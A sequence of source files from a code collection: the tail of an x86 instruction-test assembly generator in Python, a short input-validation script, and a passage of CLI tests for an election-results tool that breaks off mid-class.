sWorkerName = self.needGRegChecker(iReg1, iReg2, iReg3);
sName = 'eflags_%#x_%s' % (fFlagsToCheck, sWorkerName[len(self.ksCheckerPrefix):]);
if sName in self._dCheckFns:
self._dCheckFns[sName] += 1;
else:
self._dCheckFns[sName] = 1;
return self.ksCheckerPrefix + sName;
def needGRegMemSetup(self, cAddrBits, cbEffOp, iBaseReg = None, offDisp = None, iIndexReg = None, iScale = 1):
"""
Records the need for a given register checker function, returning its label.
"""
assert cAddrBits in [64, 32, 16];
assert cbEffOp in [8, 4, 2, 1];
assert iScale in [1, 2, 4, 8];
sName = '%ubit_U%u' % (cAddrBits, cbEffOp * 8,);
if iBaseReg is not None:
sName += '_%s' % (gregName(iBaseReg, cAddrBits),);
sName += '_x%u' % (iScale,);
if iIndexReg is not None:
sName += '_%s' % (gregName(iIndexReg, cAddrBits),);
if offDisp is not None:
sName += '_%#010x' % (offDisp & UINT32_MAX, );
if sName in self._dMemSetupFns:
self._dMemSetupFns[sName] += 1;
else:
self._dMemSetupFns[sName] = 1;
return 'Common_MemSetup_' + sName;
def need64BitConstant(self, uVal):
"""
Records the need for a 64-bit constant, returning its label.
These constants are pooled to attempt reduce the size of the whole thing.
"""
assert uVal >= 0 and uVal <= UINT64_MAX;
if uVal in self._d64BitConsts:
self._d64BitConsts[uVal] += 1;
else:
self._d64BitConsts[uVal] = 1;
return 'g_u64Const_0x%016x' % (uVal, );
def pushConst(self, uResult):
"""
Emits a push constant value, taking care of high values on 64-bit hosts.
"""
if self.oTarget.is64Bit() and uResult >= 0x80000000:
self.write(' push qword [%s wrt rip]\n' % (self.need64BitConstant(uResult),));
else:
self.write(' push dword 0x%x\n' % (uResult,));
return True;
def getDispForMod(self, iMod, cbAlignment = 1):
"""
Get a set of address dispositions for a given addressing mode.
The alignment restriction is for SIB scaling.
"""
assert cbAlignment in [1, 2, 4, 8];
if iMod == 0:
aoffDisp = [ None, ];
elif iMod == 1:
aoffDisp = [ 127 & ~(cbAlignment - 1), -128 ];
elif iMod == 2:
aoffDisp = [ 2147483647 & ~(cbAlignment - 1), -2147483648 ];
else: assert False;
return aoffDisp;
def getModRegRange(self, cbEffOp):
"""
The Mod R/M register range varies with the effective operand size, for
8-bit registers we have 4 more.
"""
if cbEffOp == 1:
return self._oModRegRange8;
return self._oModRegRange;
def getSibIndexPerRun(self):
"""
We vary the SIB index test range a little to try cover more operand
combinations and avoid repeating the same ones.
"""
self.iSibIndexRange += 1;
self.iSibIndexRange %= 3;
if self.iSibIndexRange == 0:
return self._cSibIndexPerRun - 1;
return self._cSibIndexPerRun;
def isTiny(self):
""" Checks if we're in tiny mode."""
return self.oOptions.sTestSize == InstructionTestGen.ksTestSize_Tiny;
def isMedium(self):
""" Checks if we're in medium mode."""
return self.oOptions.sTestSize == InstructionTestGen.ksTestSize_Medium;
#
# Forwarding calls for oTarget to shorted typing and lessen the attacks
# on the right margin.
#
def gregNameBits(self, iReg, cBitsWide):
""" Target: Get the name of a general register for the given size (in bits). """
return self.oTarget.gregNameBits(iReg, cBitsWide);
def gregNameBytes(self, iReg, cbWide):
""" Target: Get the name of a general register for the given size (in bytes). """
return self.oTarget.gregNameBytes(iReg, cbWide);
def is64Bit(self):
""" Target: Is the target 64-bit? """
return self.oTarget.is64Bit();
#
# Internal machinery.
#
def _randInitIndexes(self):
"""
Initializes the Mod R/M and SIB state index with random numbers prior
to generating a test.
Note! As with all other randomness and variations we do, we cannot
test all combinations for each and every instruction so we try
get coverage over time.
"""
self.iModReg = randU8();
self.iModRm = randU8();
self.iSibBaseReg = randU8();
self.iSibIndexReg = randU8();
self.iSibScale = 1 << (randU8() & 3);
self.iSibIndexRange = randU8();
return True;
def _calcTestFunctionName(self, oInstrTest, iInstrTest):
"""
Calc a test function name for the given instruction test.
"""
sName = 'TestInstr%03u_%s' % (iInstrTest, oInstrTest.sName);
return sName.replace(',', '_').replace(' ', '_').replace('%', '_');
def _generateFileHeader(self, ):
"""
Writes the file header.
Raises exception on trouble.
"""
self.write('; $Id: InstructionTestGen.py $\n'
';; @file %s\n'
'; Autogenerate by %s %s. DO NOT EDIT\n'
';\n'
'\n'
';\n'
'; Headers\n'
';\n'
'%%include "env-%s.mac"\n'
% ( os.path.basename(self.sFile),
os.path.basename(__file__), __version__[11:-1],
self.oTarget.sName,
) );
# Target environment specific init stuff.
#
# Global variables.
#
self.write('\n\n'
';\n'
'; Globals\n'
';\n');
self.write('VBINSTST_BEGINDATA\n'
'VBINSTST_GLOBALNAME_EX g_pvLow16Mem4K, data hidden\n'
' dq 0\n'
'VBINSTST_GLOBALNAME_EX g_pvLow32Mem4K, data hidden\n'
' dq 0\n'
'VBINSTST_GLOBALNAME_EX g_pvMem4K, data hidden\n'
' dq 0\n'
'VBINSTST_GLOBALNAME_EX g_uVBInsTstSubTestIndicator, data hidden\n'
' dd 0\n'
'%ifdef VBINSTST_CAN_DO_TRAPS\n'
'VBINSTST_TRAP_RECS_BEGIN\n'
'%endif\n'
'VBINSTST_BEGINCODE\n'
);
self.write('%ifdef RT_ARCH_AMD64\n');
for i in range(len(g_asGRegs64)):
self.write('g_u64KnownValue_%s: dq 0x%x\n' % (g_asGRegs64[i], self.au64Regs[i]));
self.write('%endif\n\n')
#
# Common functions.
#
# Loading common values.
self.write('\n\n'
'VBINSTST_BEGINPROC Common_LoadKnownValues\n'
'%ifdef RT_ARCH_AMD64\n');
for i in range(len(g_asGRegs64NoSp)):
if g_asGRegs64NoSp[i]:
self.write(' mov %s, 0x%x\n' % (g_asGRegs64NoSp[i], self.au64Regs[i],));
self.write('%else\n');
for i in range(8):
if g_asGRegs32NoSp[i]:
self.write(' mov %s, 0x%x\n' % (g_asGRegs32NoSp[i], self.au32Regs[i],));
self.write('%endif\n'
' ret\n'
'VBINSTST_ENDPROC Common_LoadKnownValues\n'
'\n');
self.write('VBINSTST_BEGINPROC Common_CheckKnownValues\n'
'%ifdef RT_ARCH_AMD64\n');
for i in range(len(g_asGRegs64NoSp)):
if g_asGRegs64NoSp[i]:
self.write(' cmp %s, [g_u64KnownValue_%s wrt rip]\n'
' je .ok_%u\n'
' push %u ; register number\n'
' push %s ; actual\n'
' push qword [g_u64KnownValue_%s wrt rip] ; expected\n'
' call VBINSTST_NAME(Common_BadValue)\n'
'.ok_%u:\n'
% ( g_asGRegs64NoSp[i], g_asGRegs64NoSp[i], i, i, g_asGRegs64NoSp[i], g_asGRegs64NoSp[i], i,));
self.write('%else\n');
for i in range(8):
if g_asGRegs32NoSp[i]:
self.write(' cmp %s, 0x%x\n'
' je .ok_%u\n'
' push %u ; register number\n'
' push %s ; actual\n'
' push dword 0x%x ; expected\n'
' call VBINSTST_NAME(Common_BadValue)\n'
'.ok_%u:\n'
% ( g_asGRegs32NoSp[i], self.au32Regs[i], i, i, g_asGRegs32NoSp[i], self.au32Regs[i], i,));
self.write('%endif\n'
' ret\n'
'VBINSTST_ENDPROC Common_CheckKnownValues\n'
'\n');
return True;
def _generateMemSetupFunctions(self): # pylint: disable=R0915
"""
Generates the memory setup functions.
"""
cDefAddrBits = self.oTarget.getDefAddrBits();
for sName in self._dMemSetupFns:
# Unpack it.
asParams = sName.split('_');
cAddrBits = int(asParams[0][:-3]); assert asParams[0][-3:] == 'bit';
cEffOpBits = int(asParams[1][1:]); assert asParams[1][0] == 'U';
if cAddrBits == 64: asAddrGRegs = g_asGRegs64;
elif cAddrBits == 32: asAddrGRegs = g_asGRegs32;
else: asAddrGRegs = g_asGRegs16;
i = 2;
iBaseReg = None;
sBaseReg = None;
if i < len(asParams) and asParams[i] in asAddrGRegs:
sBaseReg = asParams[i];
iBaseReg = asAddrGRegs.index(sBaseReg);
i += 1
assert i < len(asParams); assert asParams[i][0] == 'x';
iScale = iScale = int(asParams[i][1:]); assert iScale in [1, 2, 4, 8], '%u %s' % (iScale, sName);
i += 1;
sIndexReg = None;
iIndexReg = None;
if i < len(asParams) and asParams[i] in asAddrGRegs:
sIndexReg = asParams[i];
iIndexReg = asAddrGRegs.index(sIndexReg);
i += 1;
u32Disp = None;
if i < len(asParams) and len(asParams[i]) == 10:
u32Disp = long(asParams[i], 16);
i += 1;
assert i == len(asParams), 'i=%d len=%d len[i]=%d (%s)' % (i, len(asParams), len(asParams[i]), asParams[i],);
assert iScale == 1 or iIndexReg is not None;
# Find a temporary register.
iTmpReg1 = X86_GREG_xCX;
while iTmpReg1 in [iBaseReg, iIndexReg]:
iTmpReg1 += 1;
# Prologue.
self.write('\n\n'
'; cAddrBits=%s cEffOpBits=%s iBaseReg=%s u32Disp=%s iIndexReg=%s iScale=%s\n'
'VBINSTST_BEGINPROC Common_MemSetup_%s\n'
' MY_PUSH_FLAGS\n'
' push %s\n'
% ( cAddrBits, cEffOpBits, iBaseReg, u32Disp, iIndexReg, iScale,
sName, self.oTarget.asGRegs[iTmpReg1], ));
# Figure out what to use.
if cEffOpBits == 64:
sTmpReg1 = g_asGRegs64[iTmpReg1];
sDataVar = 'VBINSTST_NAME(g_u64Data)';
elif cEffOpBits == 32:
sTmpReg1 = g_asGRegs32[iTmpReg1];
sDataVar = 'VBINSTST_NAME(g_u32Data)';
elif cEffOpBits == 16:
sTmpReg1 = g_asGRegs16[iTmpReg1];
sDataVar = 'VBINSTST_NAME(g_u16Data)';
else:
assert cEffOpBits == 8; assert iTmpReg1 < 4;
sTmpReg1 = g_asGRegs8Rex[iTmpReg1];
sDataVar = 'VBINSTST_NAME(g_u8Data)';
# Special case: reg + reg * [2,4,8]
if iBaseReg == iIndexReg and iBaseReg is not None and iScale != 1:
iTmpReg2 = X86_GREG_xBP;
while iTmpReg2 in [iBaseReg, iIndexReg, iTmpReg1]:
iTmpReg2 += 1;
sTmpReg2 = self.gregNameBits(iTmpReg2, cAddrBits);
self.write(' push sAX\n'
' push %s\n'
' push sDX\n'
% (self.oTarget.asGRegs[iTmpReg2],));
if cAddrBits == 16:
self.write(' mov %s, [VBINSTST_NAME(g_pvLow16Mem4K) xWrtRIP]\n' % (sTmpReg2,));
else:
self.write(' mov %s, [VBINSTST_NAME(g_pvLow32Mem4K) xWrtRIP]\n' % (sTmpReg2,));
self.write(' add %s, 0x200\n' % (sTmpReg2,));
self.write(' mov %s, %s\n' % (self.gregNameBits(X86_GREG_xAX, cAddrBits), sTmpReg2,));
if u32Disp is not None:
self.write(' sub %s, %d\n'
% ( self.gregNameBits(X86_GREG_xAX, cAddrBits), convU32ToSigned(u32Disp), ));
self.write(' xor edx, edx\n'
'%if xCB == 2\n'
' push 0\n'
'%endif\n');
self.write(' push %u\n' % (iScale + 1,));
self.write(' div %s [xSP]\n' % ('qword' if cAddrBits == 64 else 'dword',));
self.write(' sub %s, %s\n' % (sTmpReg2, self.gregNameBits(X86_GREG_xDX, cAddrBits),));
self.write(' pop sDX\n'
' pop sDX\n'); # sTmpReg2 is eff address; sAX is sIndexReg value.
# Note! sTmpReg1 can be xDX and that's no problem now.
self.write(' mov %s, [xSP + sCB*3 + MY_PUSH_FLAGS_SIZE + xCB]\n' % (sTmpReg1,));
self.write(' mov [%s], %s\n' % (sTmpReg2, sTmpReg1,)); # Value in place.
self.write(' pop %s\n' % (self.oTarget.asGRegs[iTmpReg2],));
if iBaseReg == X86_GREG_xAX:
self.write(' pop %s\n' % (self.oTarget.asGRegs[iTmpReg1],));
else:
self.write(' mov %s, %s\n' % (sBaseReg, self.gregNameBits(X86_GREG_xAX, cAddrBits),));
self.write(' pop sAX\n');
else:
# Load the value and mem address, storing the value there.
# Note! ASSUMES that the scale and disposition works fine together.
sAddrReg = sBaseReg if sBaseReg is not None else sIndexReg;
self.write(' mov %s, [xSP + sCB + MY_PUSH_FLAGS_SIZE + xCB]\n' % (sTmpReg1,));
if cAddrBits >= cDefAddrBits:
self.write(' mov [%s xWrtRIP], %s\n' % (sDataVar, sTmpReg1,));
self.write(' lea %s, [%s xWrtRIP]\n' % (sAddrReg, sDataVar,));
else:
if cAddrBits == 16:
self.write(' mov %s, [VBINSTST_NAME(g_pvLow16Mem4K) xWrtRIP]\n' % (sAddrReg,));
else:
self.write(' mov %s, [VBINSTST_NAME(g_pvLow32Mem4K) xWrtRIP]\n' % (sAddrReg,));
self.write(' add %s, %s\n' % (sAddrReg, (randU16() << cEffOpBits) & 0xfff, ));
self.write(' mov [%s], %s\n' % (sAddrReg, sTmpReg1, ));
# Adjust for disposition and scaling.
if u32Disp is not None:
self.write(' sub %s, %d\n' % ( sAddrReg, convU32ToSigned(u32Disp), ));
if iIndexReg is not None:
if iBaseReg == iIndexReg:
assert iScale == 1;
assert u32Disp is None or (u32Disp & 1) == 0;
self.write(' shr %s, 1\n' % (sIndexReg,));
elif sBaseReg is not None:
uIdxRegVal = randUxx(cAddrBits);
if cAddrBits == 64:
self.write(' mov %s, %u\n'
' sub %s, %s\n'
' mov %s, %u\n'
% ( sIndexReg, (uIdxRegVal * iScale) & UINT64_MAX,
sBaseReg, sIndexReg,
sIndexReg, uIdxRegVal, ));
else:
assert cAddrBits == 32;
self.write(' mov %s, %u\n'
' sub %s, %#06x\n'
% ( sIndexReg, uIdxRegVal, sBaseReg, (uIdxRegVal * iScale) & UINT32_MAX, ));
elif iScale == 2:
assert u32Disp is None or (u32Disp & 1) == 0;
self.write(' shr %s, 1\n' % (sIndexReg,));
elif iScale == 4:
assert u32Disp is None or (u32Disp & 3) == 0;
self.write(' shr %s, 2\n' % (sIndexReg,));
elif iScale == 8:
assert u32Disp is None or (u32Disp & 7) == 0;
self.write(' shr %s, 3\n' % (sIndexReg,));
else:
assert iScale == 1;
# Set upper bits that's supposed to be unused.
if cDefAddrBits > cAddrBits or cAddrBits == 16:
if cDefAddrBits == 64:
assert cAddrBits == 32;
if iBaseReg is not None:
self.write(' mov %s, %#018x\n'
' or %s, %s\n'
% ( g_asGRegs64[iTmpReg1], randU64() & 0xffffffff00000000,
g_asGRegs64[iBaseReg], g_asGRegs64[iTmpReg1],));
if iIndexReg is not None and iIndexReg != iBaseReg:
self.write(' mov %s, %#018x\n'
' or %s, %s\n'
% ( g_asGRegs64[iTmpReg1], randU64() & 0xffffffff00000000,
g_asGRegs64[iIndexReg], g_asGRegs64[iTmpReg1],));
else:
assert cDefAddrBits == 32; assert cAddrBits == 16; assert iIndexReg is None;
if iBaseReg is not None:
self.write(' or %s, %#010x\n'
% ( g_asGRegs32[iBaseReg], randU32() & 0xffff0000, ));
# Epilogue.
self.write(' pop %s\n'
' MY_POP_FLAGS\n'
' ret sCB\n'
'VBINSTST_ENDPROC Common_MemSetup_%s\n'
% ( self.oTarget.asGRegs[iTmpReg1], sName,));
def _generateFileFooter(self):
"""
Generates file footer.
"""
# Terminate the trap records.
self.write('\n\n'
';\n'
'; Terminate the trap records\n'
';\n'
'VBINSTST_BEGINDATA\n'
'%ifdef VBINSTST_CAN_DO_TRAPS\n'
'VBINSTST_TRAP_RECS_END\n'
'%endif\n'
'VBINSTST_BEGINCODE\n');
# Register checking functions.
for sName in self._dCheckFns:
asRegs = sName.split('_');
sPushSize = 'dword';
# Do we check eflags first.
if asRegs[0] == 'eflags':
asRegs.pop(0);
sFlagsToCheck = asRegs.pop(0);
self.write('\n\n'
'; Check flags and then defers to the register-only checker\n'
'; To save space, the callee cleans up the stack.'
'; Ref count: %u\n'
'VBINSTST_BEGINPROC %s%s\n'
' MY_PUSH_FLAGS\n'
' push sAX\n'
' mov sAX, [xSP + sCB]\n'
' and sAX, %s\n'
' cmp sAX, [xSP + xCB + sCB*2]\n'
' je .equal\n'
% ( self._dCheckFns[sName], self.ksCheckerPrefix, sName,
sFlagsToCheck,));
self.write(' push dword 0xef ; register number\n'
' push sAX ; actual\n'
' mov sAX, [xSP + xCB + sCB*4]\n'
' push sAX ; expected\n'
' call VBINSTST_NAME(Common_BadValue)\n');
self.write('.equal:\n'
' mov xAX, [xSP + sCB*2]\n' # Remove the expected eflags value from the stack frame.
' mov [xSP + sCB*2 + xCB + sCB - xCB], xAX\n'
' pop sAX\n'
' MY_POP_FLAGS\n'
' lea xSP, [xSP + sCB]\n'
' jmp VBINSTST_NAME(Common_Check_%s)\n'
'VBINSTST_ENDPROC %s%s\n'
% ( '_'.join(asRegs),
self.ksCheckerPrefix, sName,) );
else:
# Prologue
self.write('\n\n'
'; Checks 1 or more register values, expected values pushed on the stack.\n'
'; To save space, the callee cleans up the stack.'
'; Ref count: %u\n'
'VBINSTST_BEGINPROC %s%s\n'
' MY_PUSH_FLAGS\n'
% ( self._dCheckFns[sName], self.ksCheckerPrefix, sName, ) );
# Register checks.
for i in range(len(asRegs)):
sReg = asRegs[i];
iReg = self.oTarget.asGRegs.index(sReg);
if i == asRegs.index(sReg): # Only check once, i.e. input = output reg.
self.write(' cmp %s, [xSP + MY_PUSH_FLAGS_SIZE + xCB + sCB * %u]\n'
' je .equal%u\n'
' push %s %u ; register number\n'
' push %s ; actual\n'
' mov %s, [xSP + sCB*2 + MY_PUSH_FLAGS_SIZE + xCB + sCB * %u]\n'
' push %s ; expected\n'
' call VBINSTST_NAME(Common_BadValue)\n'
'.equal%u:\n'
% ( sReg, i, i, sPushSize, iReg, sReg, sReg, i, sReg, i, ) );
# Restore known register values and check the other registers.
for sReg in asRegs:
if self.oTarget.is64Bit():
self.write(' mov %s, [g_u64KnownValue_%s wrt rip]\n' % (sReg, sReg,));
else:
iReg = self.oTarget.asGRegs.index(sReg)
self.write(' mov %s, 0x%x\n' % (sReg, self.au32Regs[iReg],));
self.write(' MY_POP_FLAGS\n'
' call VBINSTST_NAME(Common_CheckKnownValues)\n'
' ret sCB*%u\n'
'VBINSTST_ENDPROC %s%s\n'
% (len(asRegs), self.ksCheckerPrefix, sName,));
# memory setup functions
self._generateMemSetupFunctions();
# 64-bit constants.
if len(self._d64BitConsts) > 0:
self.write('\n\n'
';\n'
'; 64-bit constants\n'
';\n');
for uVal in self._d64BitConsts:
self.write('g_u64Const_0x%016x: dq 0x%016x ; Ref count: %d\n' % (uVal, uVal, self._d64BitConsts[uVal], ) );
return True;
def _generateTests(self):
"""
Generate the test cases.
"""
for self.iFile in range(self.cFiles):
if self.cFiles == 1:
self.sFile = '%s.asm' % (self.oOptions.sOutputBase,)
else:
self.sFile = '%s-%u.asm' % (self.oOptions.sOutputBase, self.iFile)
self.oFile = sys.stdout;
if self.oOptions.sOutputBase != '-':
self.oFile = io.open(self.sFile, 'w', buffering = 65536, encoding = 'utf-8');
self._generateFileHeader();
# Calc the range.
iInstrTestStart = self.iFile * self.oOptions.cInstrPerFile;
iInstrTestEnd = iInstrTestStart + self.oOptions.cInstrPerFile;
if iInstrTestEnd > len(g_aoInstructionTests):
iInstrTestEnd = len(g_aoInstructionTests);
# Generate the instruction tests.
for iInstrTest in range(iInstrTestStart, iInstrTestEnd):
oInstrTest = g_aoInstructionTests[iInstrTest];
if oInstrTest.isApplicable(self):
self.write('\n'
'\n'
';\n'
'; %s\n'
';\n'
% (oInstrTest.sName,));
self._randInitIndexes();
oInstrTest.generateTest(self, self._calcTestFunctionName(oInstrTest, iInstrTest));
# Generate the main function.
self.write('\n\n'
'VBINSTST_BEGINPROC TestInstrMain\n'
' MY_PUSH_ALL\n'
' sub xSP, 40h\n'
'%ifdef VBINSTST_CAN_DO_TRAPS\n'
' VBINSTST_TRAP_RECS_INSTALL\n'
'%endif\n'
'\n');
for iInstrTest in range(iInstrTestStart, iInstrTestEnd):
oInstrTest = g_aoInstructionTests[iInstrTest];
if oInstrTest.isApplicable(self):
self.write('%%ifdef ASM_CALL64_GCC\n'
' lea rdi, [.szInstr%03u wrt rip]\n'
'%%elifdef ASM_CALL64_MSC\n'
' lea rcx, [.szInstr%03u wrt rip]\n'
'%%else\n'
' mov xAX, .szInstr%03u\n'
' mov [xSP], xAX\n'
'%%endif\n'
' VBINSTST_CALL_FN_SUB_TEST\n'
' call VBINSTST_NAME(%s)\n'
% ( iInstrTest, iInstrTest, iInstrTest, self._calcTestFunctionName(oInstrTest, iInstrTest)));
self.write('\n'
'%ifdef VBINSTST_CAN_DO_TRAPS\n'
' VBINSTST_TRAP_RECS_UNINSTALL\n'
'%endif\n'
' add xSP, 40h\n'
' MY_POP_ALL\n'
' ret\n\n');
for iInstrTest in range(iInstrTestStart, iInstrTestEnd):
self.write('.szInstr%03u: db \'%s\', 0\n' % (iInstrTest, g_aoInstructionTests[iInstrTest].sName,));
self.write('VBINSTST_ENDPROC TestInstrMain\n\n');
self._generateFileFooter();
if self.oOptions.sOutputBase != '-':
self.oFile.close();
self.oFile = None;
self.sFile = '';
return RTEXITCODE_SUCCESS;
def _runMakefileMode(self):
"""
Generate a list of output files on standard output.
"""
if self.cFiles == 1:
print('%s.asm' % (self.oOptions.sOutputBase,));
else:
print(' '.join('%s-%s.asm' % (self.oOptions.sOutputBase, i) for i in range(self.cFiles)));
return RTEXITCODE_SUCCESS;
def run(self):
"""
Generates the tests or whatever is required.
"""
if self.oOptions.fMakefileMode:
return self._runMakefileMode();
sys.stderr.write('InstructionTestGen.py: Seed = %s\n' % (g_iMyRandSeed,));
return self._generateTests();
@staticmethod
def main():
"""
Main function a la C/C++. Returns exit code.
"""
#
# Parse the command line.
#
oParser = OptionParser(version = __version__[11:-1].strip());
oParser.add_option('--makefile-mode', dest = 'fMakefileMode', action = 'store_true', default = False,
help = 'Special mode for use to output a list of output files for the benefit of '
'the make program (kmk).');
oParser.add_option('--split', dest = 'cInstrPerFile', metavar = '<instr-per-file>', type = 'int', default = 9999999,
help = 'Number of instruction to test per output file.');
oParser.add_option('--output-base', dest = 'sOutputBase', metavar = '<file>', default = None,
help = 'The output file base name, no suffix please. Required.');
oParser.add_option('--target', dest = 'sTargetEnv', metavar = '<target>',
default = 'iprt-r3-32',
choices = g_dTargetEnvs.keys(),
help = 'The target environment. Choices: %s'
% (', '.join(sorted(g_dTargetEnvs.keys())),));
oParser.add_option('--test-size', dest = 'sTestSize', default = InstructionTestGen.ksTestSize_Medium,
choices = InstructionTestGen.kasTestSizes,
help = 'Selects the test size.');
(oOptions, asArgs) = oParser.parse_args();
if len(asArgs) > 0:
oParser.print_help();
return RTEXITCODE_SYNTAX
if oOptions.sOutputBase is None:
print('syntax error: Missing required option --output-base.', file = sys.stderr);
return RTEXITCODE_SYNTAX
#
# Instantiate the program class and run it.
#
oProgram = InstructionTestGen(oOptions);
return oProgram.run();
if __name__ == '__main__':
sys.exit(InstructionTestGen.main());
|
misc/validateInput.py | viju4you/Python | 110 | 19090 | # Validate input
while True:
print('Enter your age:')
age = input()
if age.isdecimal():
break
print('Pleas enter a number for your age.')
|
tests/test_cli.py | jameswilkerson/elex | 183 | 19094 | <filename>tests/test_cli.py
import csv
import sys
import json
import tests
try:
from cStringIO import StringIO
except ImportError:
from io import StringIO
from six import with_metaclass
from elex.cli.app import ElexApp
from collections import OrderedDict
DATA_FILE = 'tests/data/20151103_national.json'
DATA_ELECTION_DATE = '2015-11-03'
DELSUM_DATA_FILE = 'tests/data/20160118_delsum.json'
DELSUPER_DATA_FILE = 'tests/data/20160118_delsuper.json'
ELECTIONS_DATA_FILE = 'tests/data/00000000_elections.json'
DISTRICT_DATA_FILE = 'tests/data/20160201_district_results.json'
TEST_COMMANDS = [
'races',
'candidates',
'reporting-units',
'candidate-reporting-units',
'results',
]
class ElexCLICSVTestMeta(type):
def __new__(mcs, name, bases, dict):
def gen_fields_test(command):
"""
Dynamically generate a fields test
"""
def test(self):
cli_fields, cli_data = self._test_command(command=command)
api_data = getattr(self, command.replace('-', '_'))
api_fields = api_data[0].serialize().keys()
self.assertEqual(cli_fields, list(api_fields))
return test
def gen_length_test(command):
"""
Dynamically generate a data length test
"""
def test(self):
cli_fields, cli_data = self._test_command(command=command)
api_data = getattr(self, command.replace('-', '_'))
self.assertEqual(len(cli_data), len(api_data))
return test
def gen_data_test(command):
"""
Dynamically generate a data test
"""
def test(self):
cli_fields, cli_data = self._test_command(command=command)
api_data = getattr(self, command.replace('-', '_'))
for i, row in enumerate(cli_data):
for k, v in api_data[i].serialize().items():
if v is None:
v = ''
self.assertEqual(row[k], str(v))
return test
def gen_timestamp_test(command):
"""
Generate test to ensure timestamp field is set
"""
def test(self):
cli_fields, cli_data = self._test_command(command=command,
with_timestamp=True)
self.assertEqual(cli_fields[-1], 'timestamp')
return test
def gen_timestamp_data_test(command):
"""
Generate test to ensure timestamp field is set
"""
def test(self):
cli_fields, cli_data = self._test_command(command=command,
with_timestamp=True)
for row in cli_data:
try:
self.assertTrue(unicode(row['timestamp']).isnumeric())
except NameError:
self.assertTrue(str(row['timestamp']).isnumeric())
return test
def gen_batch_name_data_test(command):
"""
Generate test to ensure timestamp field is set
"""
def test(self):
cli_fields, cli_data = self._test_command(command=command,
batch_name='batch-01')
for row in cli_data:
self.assertEqual(row['batchname'], 'batch-01')
return test
for command in TEST_COMMANDS:
fields_test_name = 'test_csv_{0}_fields'.format(
command.replace('-', '_')
)
dict[fields_test_name] = gen_fields_test(command)
length_test_name = 'test_csv_{0}_length'.format(
command.replace('-', '_')
)
dict[length_test_name] = gen_length_test(command)
data_test_name = 'test_csv_{0}_data'.format(
command.replace('-', '_')
)
dict[data_test_name] = gen_data_test(command)
timestamp_test_name = 'test_csv_{0}_timestamp'.format(
command.replace('-', '_')
)
dict[timestamp_test_name] = gen_timestamp_test(command)
timestamp_data_test_name = 'test_csv_{0}_timestamp_data'.format(
command.replace('-', '_')
)
dict[timestamp_data_test_name] = gen_timestamp_data_test(command)
batch_name_data_test_name = 'test_csv_{0}_batch_name_data'.format(
command.replace('-', '_')
)
dict[batch_name_data_test_name] = gen_batch_name_data_test(command)
return type.__new__(mcs, name, bases, dict)
class ElexCLICSVTestCase(
with_metaclass(ElexCLICSVTestMeta, tests.ElectionResultsTestCase)
):
"""
This testing class is mostly dynamically generated by its metaclass.
The goal of the CLI tests is to the make sure the CLI output matches the
Python API. The API tests guarantee the validity of the data, while these
tests guarantee the CLI provides the same data in CSV format.
"""
def test_csv_elections_fields(self):
fields, data = self._test_command(
command='elections',
datafile=ELECTIONS_DATA_FILE
)
self.assertEqual(
fields,
['id', 'electiondate', 'liveresults', 'testresults']
)
def test_csv_elections_length(self):
fields, data = self._test_command(
command='elections',
datafile=ELECTIONS_DATA_FILE
)
self.assertEqual(len(data), 11)
def test_csv_elections_date(self):
fields, data = self._test_command(
command='elections',
datafile=ELECTIONS_DATA_FILE
)
self.assertEqual(data[4]['electiondate'], '2015-08-04')
def test_csv_elections_liveresults(self):
fields, data = self._test_command(
command='elections',
datafile=ELECTIONS_DATA_FILE
)
self.assertEqual(data[4]['liveresults'], 'False')
def test_csv_elections_testresults(self):
fields, data = self._test_command(
command='elections',
datafile=ELECTIONS_DATA_FILE
)
self.assertEqual(data[4]['testresults'], 'True')
def test_csv_next_election_fields(self):
fields, data = self._test_command(
command='next-election',
datafile=ELECTIONS_DATA_FILE,
electiondate='2015-08-04'
)
self.assertEqual(
fields,
['id', 'electiondate', 'liveresults', 'testresults']
)
def test_csv_next_election_length(self):
fields, data = self._test_command(
command='next-election',
datafile=ELECTIONS_DATA_FILE,
electiondate='2015-08-04'
)
self.assertEqual(len(data), 1)
def test_csv_next_election_date(self):
fields, data = self._test_command(
command='next-election',
datafile=ELECTIONS_DATA_FILE,
electiondate='2015-08-04'
)
self.assertEqual(data[0]['electiondate'], '2015-08-25')
def test_csv_next_election_liveresults(self):
fields, data = self._test_command(
command='next-election',
datafile=ELECTIONS_DATA_FILE,
electiondate='2015-08-04'
)
self.assertEqual(data[0]['liveresults'], 'True')
def test_csv_next_election_testresults(self):
fields, data = self._test_command(
command='next-election',
datafile=ELECTIONS_DATA_FILE,
electiondate='2015-08-04'
)
self.assertEqual(data[0]['testresults'], 'False')
def test_csv_delegate_fields(self):
fields, data = self._test_command(command='delegates')
self.assertEqual(
fields,
[
'level', 'party_total', 'superdelegates_count', 'last',
'state', 'candidateid', 'party_need', 'party',
'delegates_count', 'id', 'd1', 'd7', 'd30'
]
)
def test_csv_delegate_state_count(self):
fields, data = self._test_command(command='delegates')
number_of_states = list(
set([d['state'] for d in data if d['level'] == 'state'])
)
self.assertEqual(58, len(number_of_states))
def test_csv_results_resultslevel(self):
fields, data = self._test_command(
command='results',
datafile=DISTRICT_DATA_FILE,
resultslevel='district'
)
self.assertEqual(data[17]['reportingunitname'], 'District 1')
def _test_command(
self,
command,
datafile=DATA_FILE,
delsum_datafile=DELSUM_DATA_FILE,
delsuper_datafile=DELSUPER_DATA_FILE,
electiondate=DATA_ELECTION_DATE,
resultslevel=None,
with_timestamp=False,
batch_name=False
):
"""
Execute an `elex` sub-command; returns fieldnames and rows
"""
stdout_backup = sys.stdout
sys.stdout = StringIO()
argv = [command]
if electiondate is not None:
argv.append(electiondate)
argv = argv + ['--data-file', datafile]
argv = argv + ['--delegate-sum-file', delsum_datafile]
argv = argv + ['--delegate-super-file', delsuper_datafile]
argv = argv + ['--results-level', resultslevel]
if with_timestamp:
argv = argv + ['--with-timestamp']
if batch_name:
argv = argv + ['--batch-name', batch_name]
app = ElexApp(argv=argv)
app.setup()
app.log.set_level('FATAL')
app.run()
lines = sys.stdout.getvalue().split('\n')
reader = csv.DictReader(lines)
sys.stdout.close()
sys.stdout = stdout_backup
return reader.fieldnames, list(reader)
class ElexCLIJSONTestMeta(type):
def __new__(mcs, name, bases, dict):
def gen_fields_test(command):
"""
Dynamically generate a fields test
"""
def test(self):
cli_fields, cli_data = self._test_command(command=command)
api_data = getattr(self, command.replace('-', '_'))
api_fields = api_data[0].serialize().keys()
self.assertEqual(cli_fields, list(api_fields))
return test
def gen_length_test(command):
"""
Dynamically generate a data length test
"""
def test(self):
cli_fields, cli_data = self._test_command(command=command)
api_data = getattr(self, command.replace('-', '_'))
self.assertEqual(len(cli_data), len(api_data))
return test
